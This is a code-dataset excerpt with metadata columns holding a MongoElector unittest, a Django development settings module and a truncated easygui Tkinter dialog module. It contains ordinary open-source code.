repo_name | path | copies | size | text | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
zebpalmer/MongoElector | tests/test_mongoelector.py | 1 | 1505 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_mongoelector
----------------------------------
Tests for `mongoelector` module.
"""
import unittest
from time import sleep
from pymongo import MongoClient
from mongoelector import MongoElector
from random import randint
class TestMongoelector(unittest.TestCase):
"""Test Mongoelector Functionality"""
def setUp(self):
"""setup unittests"""
db = getattr(MongoClient(), "ml_unittest")
db.ml_unittest.electorlocks.drop()
def tearDown(self):
"""teardown unittests"""
db = getattr(MongoClient(), "ml_unittest")
db.electorlocks.drop()
def test_000_init(self):
"""Smoke test"""
db = getattr(MongoClient(), "ml_unittest")
MongoElector('test_001_init', db)
def test_001_run(self):
db = getattr(MongoClient(), "ml_unittest")
m1 = MongoElector('test_001_run_' + str(randint(0,10000)), db,
ttl=15)
m1.start()
c = 0
while c < 30 and m1.ismaster is False:
c += 1
sleep(1)
self.assertTrue(m1.ismaster)
self.assertTrue(m1.running)
m1.poll()
self.assertIsInstance(m1.cluster_detail, dict)
m1.stop()
m1.poll()
c = 0
while c < 30 and m1.ismaster is True:
c += 1
sleep(1)
self.assertFalse(m1.ismaster)
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
| lgpl-3.0 | -8,631,035,411,384,870,000 | 21.80303 | 70 | 0.55814 | false | 3.716049 | true | false | false |
mhotwagner/backstage | backstage/settings/base.py | 1 | 3790 | """
Django settings for backstage project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from unipath import Path
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = Path(__file__).ancestor(3)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '45h_l__1dn&5sr(gb)l*x9j6fw=3okecd10ilotci-95gy1m^o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*',]
# Application definition
INSTALLED_APPS = [
'jet',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'adminsortable2',
'storages',
'rest_framework',
'django_assets',
'imagekit',
'solo',
'ckeditor',
'api',
'facade',
'opere',
'foti',
'scritti',
'frontend',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
ROOT_URLCONF = 'urls.base'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backstage.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'
CKEDITOR_UPLOAD_PATH = "uploads/"
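# --- Hedged example (not part of the original file) ---
# A common pattern is a per-environment companion module that overrides these
# base settings. The module name "backstage/settings/local.py" and the values
# below are assumptions for illustration only:
#
#     from .base import *
#     DEBUG = False
#     ALLOWED_HOSTS = ['backstage.example.com']
#     SECRET_KEY = os.environ['DJANGO_SECRET_KEY']  # keep secrets out of source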
| mit | -8,667,195,020,869,112,000 | 25.319444 | 91 | 0.689182 | false | 3.522305 | false | false | false |
draperjames/qtpandas | qtpandas/ui/fallback/easygui/boxes/base_boxes.py | 1 | 39397 | """
.. moduleauthor:: Stephen Raymond Ferg and Robert Lugg (active)
.. default-domain:: py
.. highlight:: python
Version |release|
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import zip
from builtins import dict
from builtins import str
from builtins import range
from builtins import int
from future import standard_library
standard_library.install_aliases()
from builtins import object
import os
import string
from . import utils as ut
from .utils import *
from . import state as st
# Initialize some global variables that will be reset later
__choiceboxMultipleSelect = None
__replyButtonText = None
__choiceboxResults = None
__firstWidget = None
__enterboxText = None
__enterboxDefaultText = ""
__multenterboxText = ""
choiceboxChoices = None
choiceboxWidget = None
entryWidget = None
boxRoot = None
# -------------------------------------------------------------------
# buttonbox
# -------------------------------------------------------------------
def buttonbox(msg="", title=" ", choices=("Button[1]", "Button[2]", "Button[3]"), image=None, root=None, default_choice=None, cancel_choice=None):
"""
Display a msg, a title, an image, and a set of buttons.
The buttons are defined by the members of the choices list.
:param str msg: the msg to be displayed
:param str title: the window title
:param list choices: a list or tuple of the choices to be displayed
:param str image: Filename of image to display
:param str default_choice: The choice you want highlighted when the gui appears
:param str cancel_choice: If the user presses the 'X' close, which button should be pressed
:return: the text of the button that the user selected
"""
global boxRoot, __replyButtonText, buttonsFrame
# If default is not specified, select the first button. This matches old
# behavior.
if default_choice is None:
default_choice = choices[0]
# Initialize __replyButtonText to the first choice.
# This is what will be used if the window is closed by the close button.
__replyButtonText = choices[0]
if root:
root.withdraw()
boxRoot = Toplevel(master=root)
boxRoot.withdraw()
else:
boxRoot = Tk()
boxRoot.withdraw()
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.minsize(400, 100)
# ------------- define the messageFrame ---------------------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# ------------- define the imageFrame ---------------------------------
if image:
tk_Image = None
try:
tk_Image = ut.load_tk_image(image)
except Exception as inst:
print(inst)
if tk_Image:
imageFrame = Frame(master=boxRoot)
imageFrame.pack(side=TOP, fill=BOTH)
label = Label(imageFrame, image=tk_Image)
label.image = tk_Image # keep a reference!
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# -------------------- place the widgets in the frames -------------------
messageWidget = Message(messageFrame, text=msg, width=400)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
__put_buttons_in_buttonframe(choices, default_choice, cancel_choice)
# -------------- the action begins -----------
boxRoot.deiconify()
boxRoot.mainloop()
boxRoot.destroy()
if root:
root.deiconify()
return __replyButtonText
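# --- Hedged usage sketch (not part of the original module) ---
# Based only on the buttonbox() signature above; needs a working Tk display:
#
#     reply = buttonbox(msg="Save changes?", title="Confirm",
#                       choices=("Save", "Discard", "Cancel"),
#                       default_choice="Save", cancel_choice="Cancel")
#     print(reply)  # text of the button the user selected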
def bindArrows(widget):
widget.bind("<Down>", tabRight)
widget.bind("<Up>", tabLeft)
widget.bind("<Right>", tabRight)
widget.bind("<Left>", tabLeft)
def tabRight(event):
boxRoot.event_generate("<Tab>")
def tabLeft(event):
boxRoot.event_generate("<Shift-Tab>")
# -----------------------------------------------------------------------
# __multfillablebox
# -----------------------------------------------------------------------
def __multfillablebox(msg="Fill in values for the fields.", title=" ", fields=(), values=(), mask=None):
global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton
choices = ["OK", "Cancel"]
if len(fields) == 0:
return None
fields = list(fields[:]) # convert possible tuples to a list
values = list(values[:]) # convert possible tuples to a list
# TODO RL: The following seems incorrect when values>fields. Replace
# below with zip?
if len(values) == len(fields):
pass
elif len(values) > len(fields):
fields = fields[0:len(values)]
else:
while len(values) < len(fields):
values.append("")
boxRoot = Tk()
boxRoot.protocol('WM_DELETE_WINDOW', __multenterboxQuit)
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.bind("<Escape>", __multenterboxCancel)
# -------------------- put subframes in the boxRoot --------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# -------------------- the msg widget ----------------------------
messageWidget = Message(messageFrame, width="4.5i", text=msg)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
global entryWidgets
entryWidgets = list()
lastWidgetIndex = len(fields) - 1
for widgetIndex in range(len(fields)):
argFieldName = fields[widgetIndex]
argFieldValue = values[widgetIndex]
entryFrame = Frame(master=boxRoot)
entryFrame.pack(side=TOP, fill=BOTH)
# --------- entryWidget ----------------------------------------------
labelWidget = Label(entryFrame, text=argFieldName)
labelWidget.pack(side=LEFT)
entryWidget = Entry(entryFrame, width=40, highlightthickness=2)
entryWidgets.append(entryWidget)
entryWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE))
entryWidget.pack(side=RIGHT, padx="3m")
bindArrows(entryWidget)
entryWidget.bind("<Return>", __multenterboxGetText)
entryWidget.bind("<Escape>", __multenterboxCancel)
# for the last entryWidget, if this is a multpasswordbox,
# show the contents as just asterisks
if widgetIndex == lastWidgetIndex:
if mask:
entryWidgets[widgetIndex].configure(show=mask)
# put text into the entryWidget
if argFieldValue is None:
argFieldValue = ''
entryWidgets[widgetIndex].insert(0, '{}'.format(argFieldValue))
widgetIndex += 1
# ------------------ ok button -------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=BOTTOM, fill=BOTH)
okButton = Button(buttonsFrame, takefocus=1, text="OK")
bindArrows(okButton)
okButton.pack(
expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __multenterboxGetText
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# ------------------ cancel button -------------------------------
cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
bindArrows(cancelButton)
cancelButton.pack(
expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __multenterboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# ------------------- time for action! -----------------
entryWidgets[0].focus_force() # put the focus on the entryWidget
boxRoot.mainloop() # run it!
# -------- after the run has completed ----------------------------------
boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
return __multenterboxText
# -----------------------------------------------------------------------
# __multenterboxGetText
# -----------------------------------------------------------------------
def __multenterboxGetText(event):
global __multenterboxText
__multenterboxText = list()
for entryWidget in entryWidgets:
__multenterboxText.append(entryWidget.get())
boxRoot.quit()
def __multenterboxCancel(event):
global __multenterboxText
__multenterboxText = None
boxRoot.quit()
def __multenterboxQuit():
__multenterboxCancel(None)
def __fillablebox(msg, title="", default="", mask=None, image=None, root=None):
"""
Show a box in which a user can enter some text.
You may optionally specify some default text, which will appear in the
enterbox when it is displayed.
Returns the text that the user entered, or None if he cancels the operation.
"""
global boxRoot, __enterboxText, __enterboxDefaultText
global cancelButton, entryWidget, okButton
if title is None:
title == ""
if default is None:
default = ""
__enterboxDefaultText = default
__enterboxText = __enterboxDefaultText
if root:
root.withdraw()
boxRoot = Toplevel(master=root)
boxRoot.withdraw()
else:
boxRoot = Tk()
boxRoot.withdraw()
boxRoot.protocol('WM_DELETE_WINDOW', __enterboxQuit)
boxRoot.title(title)
boxRoot.iconname('Dialog')
boxRoot.geometry(st.rootWindowPosition)
boxRoot.bind("<Escape>", __enterboxCancel)
# ------------- define the messageFrame ---------------------------------
messageFrame = Frame(master=boxRoot)
messageFrame.pack(side=TOP, fill=BOTH)
# ------------- define the imageFrame ---------------------------------
try:
tk_Image = ut.load_tk_image(image)
except Exception as inst:
print(inst)
tk_Image = None
if tk_Image:
imageFrame = Frame(master=boxRoot)
imageFrame.pack(side=TOP, fill=BOTH)
label = Label(imageFrame, image=tk_Image)
label.image = tk_Image # keep a reference!
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# ------------- define the entryFrame ---------------------------------
entryFrame = Frame(master=boxRoot)
entryFrame.pack(side=TOP, fill=BOTH)
# ------------- define the buttonsFrame ---------------------------------
buttonsFrame = Frame(master=boxRoot)
buttonsFrame.pack(side=TOP, fill=BOTH)
# -------------------- the msg widget ----------------------------
messageWidget = Message(messageFrame, width="4.5i", text=msg)
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
# --------- entryWidget ----------------------------------------------
entryWidget = Entry(entryFrame, width=40)
bindArrows(entryWidget)
entryWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE))
if mask:
entryWidget.configure(show=mask)
entryWidget.pack(side=LEFT, padx="3m")
entryWidget.bind("<Return>", __enterboxGetText)
entryWidget.bind("<Escape>", __enterboxCancel)
# put text into the entryWidget
entryWidget.insert(0, __enterboxDefaultText)
# ------------------ ok button -------------------------------
okButton = Button(buttonsFrame, takefocus=1, text="OK")
bindArrows(okButton)
okButton.pack(
expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __enterboxGetText
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<{}>".format(selectionEvent), handler)
# ------------------ cancel button -------------------------------
cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
bindArrows(cancelButton)
cancelButton.pack(
expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __enterboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<{}>".format(selectionEvent), handler)
# ------------------- time for action! -----------------
entryWidget.focus_force() # put the focus on the entryWidget
boxRoot.deiconify()
boxRoot.mainloop() # run it!
# -------- after the run has completed ----------------------------------
if root:
root.deiconify()
boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
return __enterboxText
def __enterboxGetText(event):
global __enterboxText
__enterboxText = entryWidget.get()
boxRoot.quit()
def __enterboxRestore(event):
global entryWidget
entryWidget.delete(0, len(entryWidget.get()))
entryWidget.insert(0, __enterboxDefaultText)
def __enterboxCancel(event):
global __enterboxText
__enterboxText = None
boxRoot.quit()
def __enterboxQuit():
return __enterboxCancel(None)
# -----------------------------------------------------------------------
# __choicebox
# -----------------------------------------------------------------------
def __choicebox(msg, title, choices):
"""
internal routine to support choicebox() and multchoicebox()
"""
global boxRoot, __choiceboxResults, choiceboxWidget, defaultText
global choiceboxWidget, choiceboxChoices
# -------------------------------------------------------------------
# If choices is a tuple, we make it a list so we can sort it.
# If choices is already a list, we make a new list, so that when
# we sort the choices, we don't affect the list object that we
# were given.
# -------------------------------------------------------------------
choices = list(choices[:])
if len(choices) == 0:
choices = ["Program logic error - no choices were specified."]
defaultButtons = ["OK", "Cancel"]
choices = [str(c) for c in choices]
# TODO RL: lines_to_show is set to a min and then set to 20 right after
# that. Figure out why.
lines_to_show = min(len(choices), 20)
lines_to_show = 20
if title is None:
title = ""
# Initialize __choiceboxResults
# This is the value that will be returned if the user clicks the close icon
__choiceboxResults = None
boxRoot = Tk()
# RL: Removed so top-level program can be closed with an 'x'
boxRoot.protocol('WM_DELETE_WINDOW', __choiceboxQuit)
screen_width = boxRoot.winfo_screenwidth()
screen_height = boxRoot.winfo_screenheight()
root_width = int((screen_width * 0.8))
root_height = int((screen_height * 0.5))
root_xpos = int((screen_width * 0.1))
root_ypos = int((screen_height * 0.05))
boxRoot.title(title)
boxRoot.iconname('Dialog')
st.rootWindowPosition = "+0+0"
boxRoot.geometry(st.rootWindowPosition)
boxRoot.expand = NO
boxRoot.minsize(root_width, root_height)
st.rootWindowPosition = '+{0}+{1}'.format(root_xpos, root_ypos)
boxRoot.geometry(st.rootWindowPosition)
# ---------------- put the frames in the window --------------------------
message_and_buttonsFrame = Frame(master=boxRoot)
message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
messageFrame = Frame(message_and_buttonsFrame)
messageFrame.pack(side=LEFT, fill=X, expand=YES)
buttonsFrame = Frame(message_and_buttonsFrame)
buttonsFrame.pack(side=RIGHT, expand=NO, pady=0)
choiceboxFrame = Frame(master=boxRoot)
choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
# -------------------------- put the widgets in the frames ---------------
# ---------- put a msg widget in the msg frame-------------------
messageWidget = Message(
messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
messageWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
# -------- put the choiceboxWidget in the choiceboxFrame ----------------
choiceboxWidget = Listbox(choiceboxFrame, height=lines_to_show, borderwidth="1m", relief="flat", bg="white"
)
if __choiceboxMultipleSelect:
choiceboxWidget.configure(selectmode=MULTIPLE)
choiceboxWidget.configure(
font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE))
# add a vertical scrollbar to the frame
rightScrollbar = Scrollbar(
choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview)
choiceboxWidget.configure(yscrollcommand=rightScrollbar.set)
# add a horizontal scrollbar to the frame
bottomScrollbar = Scrollbar(
choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview)
choiceboxWidget.configure(xscrollcommand=bottomScrollbar.set)
# pack the Listbox and the scrollbars. Note that although we must define
# the textArea first, we must pack it last, so that the bottomScrollbar will
# be located properly.
bottomScrollbar.pack(side=BOTTOM, fill=X)
rightScrollbar.pack(side=RIGHT, fill=Y)
choiceboxWidget.pack(
side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH)
# ---------------------------------------------------
# sort the choices
# eliminate duplicates
# put the choices into the choicebox Widget
# ---------------------------------------------------
choices = ut.lower_case_sort(choices)
lastInserted = None
choiceboxChoices = list()
for choice in choices:
if choice == lastInserted:
continue
else:
choiceboxWidget.insert(END, choice)
choiceboxChoices.append(choice)
lastInserted = choice
boxRoot.bind('<Any-Key>', KeyboardListener)
# put the buttons in the buttonsFrame
if len(choices):
okButton = Button(
buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
bindArrows(okButton)
okButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# for the commandButton, bind activation events to the activation event
# handler
commandButton = okButton
handler = __choiceboxGetChoice
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# now bind the keyboard events
choiceboxWidget.bind("<Return>", __choiceboxGetChoice)
choiceboxWidget.bind("<Double-Button-1>", __choiceboxGetChoice)
else:
# now bind the keyboard events
choiceboxWidget.bind("<Return>", __choiceboxCancel)
choiceboxWidget.bind("<Double-Button-1>", __choiceboxCancel)
cancelButton = Button(
buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6)
bindArrows(cancelButton)
cancelButton.pack(
expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# for the commandButton, bind activation events to the activation event
# handler
commandButton = cancelButton
handler = __choiceboxCancel
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
commandButton.bind("<%s>" % selectionEvent, handler)
# add special buttons for multiple select features
if len(choices) and __choiceboxMultipleSelect:
selectionButtonsFrame = Frame(messageFrame)
selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO)
selectAllButton = Button(
selectionButtonsFrame, text="Select All", height=1, width=6)
bindArrows(selectAllButton)
selectAllButton.bind("<Button-1>", __choiceboxSelectAll)
selectAllButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
clearAllButton = Button(
selectionButtonsFrame, text="Clear All", height=1, width=6)
bindArrows(clearAllButton)
clearAllButton.bind("<Button-1>", __choiceboxClearAll)
clearAllButton.pack(
expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
# -------------------- bind some keyboard events -------------------------
boxRoot.bind("<Escape>", __choiceboxCancel)
# --------------------- the action begins --------------------------------
# put the focus on the choiceboxWidget, and the select highlight on the
# first item
choiceboxWidget.select_set(0)
choiceboxWidget.focus_force()
# --- run it! -----
boxRoot.mainloop()
try:
boxRoot.destroy()
except:
pass
return __choiceboxResults
def __choiceboxGetChoice(event):
global boxRoot, __choiceboxResults, choiceboxWidget
if __choiceboxMultipleSelect:
__choiceboxResults = [
choiceboxWidget.get(index) for index in choiceboxWidget.curselection()]
else:
choice_index = choiceboxWidget.curselection()
__choiceboxResults = choiceboxWidget.get(choice_index)
boxRoot.quit()
def __choiceboxSelectAll(event):
global choiceboxWidget, choiceboxChoices
choiceboxWidget.selection_set(0, len(choiceboxChoices) - 1)
def __choiceboxClearAll(event):
global choiceboxWidget, choiceboxChoices
choiceboxWidget.selection_clear(0, len(choiceboxChoices) - 1)
def __choiceboxCancel(event):
global boxRoot, __choiceboxResults
__choiceboxResults = None
boxRoot.quit()
def __choiceboxQuit():
__choiceboxCancel(None)
def KeyboardListener(event):
global choiceboxChoices, choiceboxWidget
key = event.keysym
if len(key) <= 1:
if key in string.printable:
# Find the key in the list.
# before we clear the list, remember the selected member
try:
start_n = int(choiceboxWidget.curselection()[0])
except IndexError:
start_n = -1
# clear the selection.
choiceboxWidget.selection_clear(0, 'end')
# start from previous selection +1
for n in range(start_n + 1, len(choiceboxChoices)):
item = choiceboxChoices[n]
if item[0].lower() == key.lower():
choiceboxWidget.selection_set(first=n)
choiceboxWidget.see(n)
return
else:
# has not found it so loop from top
for n, item in enumerate(choiceboxChoices):
if item[0].lower() == key.lower():
choiceboxWidget.selection_set(first=n)
choiceboxWidget.see(n)
return
# nothing matched -- we'll look for the next logical choice
for n, item in enumerate(choiceboxChoices):
if item[0].lower() > key.lower():
if n > 0:
choiceboxWidget.selection_set(first=(n - 1))
else:
choiceboxWidget.selection_set(first=0)
choiceboxWidget.see(n)
return
# still no match (nothing was greater than the key)
# we set the selection to the first item in the list
lastIndex = len(choiceboxChoices) - 1
choiceboxWidget.selection_set(first=lastIndex)
choiceboxWidget.see(lastIndex)
return
# -------------------------------------------------------------------
# diropenbox
# -------------------------------------------------------------------
def diropenbox(msg=None, title=None, default=None):
"""
A dialog to get a directory name.
Note that the msg argument, if specified, is ignored.
Returns the name of a directory, or None if user chose to cancel.
If the "default" argument specifies a directory name, and that
directory exists, then the dialog box will start with that directory.
:param str msg: the msg to be displayed
:param str title: the window title
:param str default: starting directory when dialog opens
:return: Normalized path selected by user
"""
title = getFileDialogTitle(msg, title)
localRoot = Tk()
localRoot.withdraw()
if not default:
default = None
f = ut.tk_FileDialog.askdirectory(
parent=localRoot, title=title, initialdir=default, initialfile=None
)
localRoot.destroy()
if not f:
return None
return os.path.normpath(f)
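# --- Hedged usage sketch (not part of the original module) ---
#
#     folder = diropenbox(title="Choose a folder", default=".")
#     if folder is None:
#         print("user cancelled")  # otherwise a normalized directory path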
# -------------------------------------------------------------------
# getFileDialogTitle
# -------------------------------------------------------------------
def getFileDialogTitle(msg, title):
"""
Create nicely-formatted string based on arguments msg and title
:param msg: the msg to be displayed
:param title: the window title
    :return: the formatted title string, or None if both msg and title are None
"""
if msg and title:
return "%s - %s" % (title, msg)
if msg and not title:
return str(msg)
if title and not msg:
return str(title)
return None # no message and no title
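# Worked examples, traced from the branches above:
#     getFileDialogTitle("Pick a file", "MyApp")  -> 'MyApp - Pick a file'
#     getFileDialogTitle("Pick a file", None)     -> 'Pick a file'
#     getFileDialogTitle(None, None)              -> None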
# -------------------------------------------------------------------
# class FileTypeObject for use with fileopenbox
# -------------------------------------------------------------------
class FileTypeObject(object):
def __init__(self, filemask):
if len(filemask) == 0:
raise AssertionError('Filetype argument is empty.')
self.masks = list()
if isinstance(filemask, ut.str): # a str or unicode
self.initializeFromString(filemask)
elif isinstance(filemask, list):
if len(filemask) < 2:
raise AssertionError('Invalid filemask.\n'
+ 'List contains less than 2 members: "{}"'.format(filemask))
else:
self.name = filemask[-1]
self.masks = list(filemask[:-1])
else:
raise AssertionError('Invalid filemask: "{}"'.format(filemask))
def __eq__(self, other):
if self.name == other.name:
return True
return False
def add(self, other):
for mask in other.masks:
if mask in self.masks:
pass
else:
self.masks.append(mask)
def toTuple(self):
return self.name, tuple(self.masks)
def isAll(self):
if self.name == "All files":
return True
return False
def initializeFromString(self, filemask):
# remove everything except the extension from the filemask
self.ext = os.path.splitext(filemask)[1]
if self.ext == "":
self.ext = ".*"
if self.ext == ".":
self.ext = ".*"
self.name = self.getName()
self.masks = ["*" + self.ext]
def getName(self):
e = self.ext
file_types = {".*": "All", ".txt": "Text",
".py": "Python", ".pyc": "Python", ".xls": "Excel"}
if e in file_types:
return '{} files'.format(file_types[e])
if e.startswith("."):
return '{} files'.format(e[1:].upper())
return '{} files'.format(e.upper())
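# Worked examples, traced from initializeFromString() and getName() above:
#     FileTypeObject("*.txt").toTuple()  -> ('Text files', ('*.txt',))
#     FileTypeObject("*.rst").toTuple()  -> ('RST files', ('*.rst',))
#     FileTypeObject("*").toTuple()      -> ('All files', ('*.*',))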
# -------------------------------------------------------------------
# fileopenbox
# -------------------------------------------------------------------
def fileopenbox(msg=None, title=None, default='*', filetypes=None, multiple=False):
"""
A dialog to get a file name.
**About the "default" argument**
The "default" argument specifies a filepath that (normally)
contains one or more wildcards.
fileopenbox will display only files that match the default filepath.
If omitted, defaults to "\*" (all files in the current directory).
WINDOWS EXAMPLE::
...default="c:/myjunk/*.py"
will open in directory c:\\myjunk\\ and show all Python files.
WINDOWS EXAMPLE::
...default="c:/myjunk/test*.py"
will open in directory c:\\myjunk\\ and show all Python files
whose names begin with "test".
Note that on Windows, fileopenbox automatically changes the path
separator to the Windows path separator (backslash).
**About the "filetypes" argument**
If specified, it should contain a list of items,
where each item is either:
- a string containing a filemask # e.g. "\*.txt"
- a list of strings, where all of the strings except the last one
are filemasks (each beginning with "\*.",
such as "\*.txt" for text files, "\*.py" for Python files, etc.).
and the last string contains a filetype description
EXAMPLE::
filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ]
.. note:: If the filetypes list does not contain ("All files","*"), it will be added.
If the filetypes list does not contain a filemask that includes
the extension of the "default" argument, it will be added.
For example, if default="\*abc.py"
and no filetypes argument was specified, then
"\*.py" will automatically be added to the filetypes argument.
:param str msg: the msg to be displayed.
:param str title: the window title
:param str default: filepath with wildcards
:param object filetypes: filemasks that a user can choose, e.g. "\*.txt"
:param bool multiple: If true, more than one file can be selected
:return: the name of a file, or None if user chose to cancel
"""
localRoot = Tk()
localRoot.withdraw()
initialbase, initialfile, initialdir, filetypes = fileboxSetup(
default, filetypes)
# ------------------------------------------------------------
# if initialfile contains no wildcards; we don't want an
# initial file. It won't be used anyway.
# Also: if initialbase is simply "*", we don't want an
# initialfile; it is not doing any useful work.
# ------------------------------------------------------------
if (initialfile.find("*") < 0) and (initialfile.find("?") < 0):
initialfile = None
elif initialbase == "*":
initialfile = None
func = ut.tk_FileDialog.askopenfilenames if multiple else ut.tk_FileDialog.askopenfilename
ret_val = func(parent=localRoot, title=getFileDialogTitle(msg, title), initialdir=initialdir, initialfile=initialfile, filetypes=filetypes
)
if multiple:
f = [os.path.normpath(x) for x in localRoot.tk.splitlist(ret_val)]
else:
f = os.path.normpath(ret_val)
localRoot.destroy()
if not f:
return None
return f
# -------------------------------------------------------------------
# filesavebox
# -------------------------------------------------------------------
def filesavebox(msg=None, title=None, default="", filetypes=None):
"""
    A dialog to get the name of a file to save.
Returns the name of a file, or None if user chose to cancel.
The "default" argument should contain a filename (i.e. the
